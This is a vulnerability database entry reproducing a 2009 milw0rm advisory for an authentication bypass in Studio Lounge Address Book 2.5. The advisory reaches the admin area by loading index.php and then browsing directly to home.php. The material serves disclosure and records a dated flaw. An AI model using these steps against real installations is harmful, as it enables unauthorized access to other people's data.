Control Panel Bypass

vendor:

Address Book

by:

ThE g0bL!N

8,8

CVSS

HIGH

Bypass

N/A

CWE

Product Name: Address Book

Affected Version From: 2.5

Affected Version To: 2.5

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

The vulnerability allows an attacker to bypass the control panel of Studio Lounge Address Book 2.5. By accessing the URL http://loclahost/addressbook/index.php and then http://loclahost/addressbook/home.php, the attacker can bypass the control panel.

Mitigation:

N/A

Source

Exploit-DB raw data:

[~] ----------------------------Ø¨Ø³Ù… Ø§Ù„Ù„Ù‡ Ø§Ù„Ø±ØÙ…Ù† Ø§Ù„Ø±ØÙŠÙ…-----------------------------
  
 [~]Download: http://www.studiolounge.net/2007/08/17/address-book-25
  
 [~]Software: Studio Lounge Address Book 2.5
 [~]author: ThE g0bL!N
 [~] Home: WWW.h4ckf0ru.com
Chi3arona houa :  Serra7 merra7 , koulchi mderra7>>>>
             Aflawa Kamikaz Wa4rin Fi kol Bla4s
[~] -----------------------------{ Iam MuSlIm}------------------------------
  
Control Panel Bypass
-----------------------
exploit:
-------
http://loclahost/addressbook/index.php
Then go to url:
--------------
http://loclahost/addressbook/home.php
Control Panle Bypassed :)
[~]--------------------------------------------------------------------------------
 
 [~] Greetz To:
  [~]
  [~] Dos-Dz TeaM - Snakes TeaM - Team Sobh4n ALLAH -His0k4-
  [~]
 [~]--------------------------------------------------------------------------------

# milw0rm.com [2009-04-21]